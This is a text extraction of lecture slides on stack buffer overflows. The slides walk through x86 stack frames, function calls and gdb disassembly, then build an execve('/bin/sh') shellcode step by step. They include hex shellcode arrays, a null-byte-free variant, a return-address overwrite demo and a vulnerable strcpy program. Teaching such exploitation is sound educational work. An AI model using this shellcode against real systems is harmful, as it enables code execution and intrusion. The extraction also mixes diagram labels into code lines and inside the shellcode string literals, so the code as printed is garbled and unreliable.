Professional Documents
Culture Documents
08 Buffer Overflow
08 Buffer Overflow
How to Propagate
1000000
500000
300000
100000
75000
10000
6000
1000
100
10
1
1988 2001 2003 2004 2008
Morris CodeRed SQL Slammer Sasser Conficker
Run-Time Memory Subdivision
memory top
Stack
Free Memory
Heap
Static
Code
memory bottom
Instruction Layout
label: instruction operands ; comment
• Intel syntax
• INSTR dest, src
• Used by NASM
• AT&T syntax
• INSTR src, dest
• Used by GAS
Stack Instructions
push arg
pop arg
Function Calls
call proc
ret
Callee
int sum(int p1, int p2, int p3) foo:
{ t1 = p1 + p2
return p1+p2+p3; t1 = t1 + p3
} return t1
Example
previous frame pointer ebp
callee saved registers
Caller a
param c
b
param b
param a c
call foo, 3 stack temporaries
dynamic area
Callee esp
foo:
t1 = p1 + p2
t1 = t1 + p3 Before
return t1
Example
previous frame pointer ebp
callee saved registers
Caller a
param c
b
param b
param a c
call foo, 3 stack temporaries
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 esp
return t1
After param’s
Example
previous frame pointer ebp
callee saved registers
Caller a
param c
b
param b
param a c
call foo, 3 stack temporaries
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 return address
return t1
esp
After call foo, 3
Example
previous frame pointer
callee saved registers
Caller a
param c
b
param b
param a c
call foo, 3 stack temporaries
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 return address
return t1 previous frame pointer ebp
t1
esp
Example
previous frame pointer ebp
Caller callee saved registers
param c a ebp−8
param b
param a
b
call foo, 3 c
stack temporaries
dynamic area
p3
p2
push [ebp-16]
push [ebp-12] p1
push [ebp-8] return address
call foo
esp
After call foo, 3
Callee
foo:
t1 = p1 + p2
t1 = t1 + p3
previous frame pointer
return t1
callee saved registers
a
b
push ebp c
mov esp,ebp stack temporaries
sub esp,8 dynamic area
mov edx,[ebp+8]
add edx,[ebp+12]
p3
add edx,[ebp+16] p2
mov [ebp-4],edx p1
mov eax,[ebp-4]
return address
mov esp,ebp
pop ebp previous frame pointer ebp
t1
Intel syntax esp
void function(int a, int b, int c) { pushl %ebp
char buffer1[5]; movl %esp,%ebp
char buffer2[10]; subl $20,%esp
}
pushl $3
void main() {
pushl $2
function(1,2,3);
pushl $1
}
call function
buffer2
void function(char *str) {
char buffer[16]; caller’s frame
strcpy(buffer,str); str
}
ret
void main() { sfp
char large_string[256];
int i;
function(large_string);
}
caller’s frame
c
b
void function(int a, int b, int c) {
char buffer1[5]; a
char buffer2[10]; ret
}
sfp
void main() { buffer1
function(1,2,3);
}
buffer2
void function(int a, int b, int c) {
char buffer1[5]; caller’s frame
char buffer2[10]; c
int *ret;
b
ret = buffer1 + 12; a
(*ret) += 8; ret
}
sfp
void main() {
int x;
buffer1
x = 0;
function(1,2,3); buffer2
x = 1;
printf("%d\n",x);
}
$ gdb example3
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>: pushl %ebp
0x8000491 <main+1>: movl %esp,%ebp
0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
void main() {
exit(0);
}
movl string_addr,string_addr_addr
“/bin/sh”
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax Call exit
movl string_addr,%ebx Call execve
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.
jmp offset-to-call # 2 bytes
popl %esi # 1 byte caller’s frame
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes ret
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset,(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
jmp 0x26 # 2 bytes
popl %esi # 1 byte
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset,(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string \”/bin/sh\”
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00" caller’s frame
"\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" ret
"\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\xd1\xff\xff"
sfp
"\xff\x2f\x62\x69\x6e\x2f\x73\x68"
c
"\x00\x89\xec\x5d\xc3";
void main() {
int *c;
shellcode
c = (int *)&c + 2;
(*c) = (int)shellcode;
}
void main() {
__asm__("
jmp 0x2a # 3 bytes
popl %esi # 1 byte
...
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
");
}
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: jmp 0x800015f <main+47>
...
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>: 0xeb
(gdb)
0x8000134 <main+4>: 0x2a
(gdb)
...
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00" caller’s frame
"\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" ret
"\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\xd1\xff\xff"
sfp
"\xff\x2f\x62\x69\x6e\x2f\x73\x68"
c
"\x00\x89\xec\x5d\xc3";
void main() {
int *c;
shellcode
c = (int *)&c + 2;
(*c) = (int)shellcode;
}
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
xorl %ebx,%ebx
movl $0x1, %eax
movl %ebx,%eax
movl $0x0, %ebx
inc %eax
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
caller’s frame
"\x88\x46\x07\x89\x46\x0c\xb0\x0b" ret
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd" sfp
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
local storage
void main() {
int *ret; buffer
if (argc > 1)
strcpy(buffer,argv[1]); Address of “buffer”?
}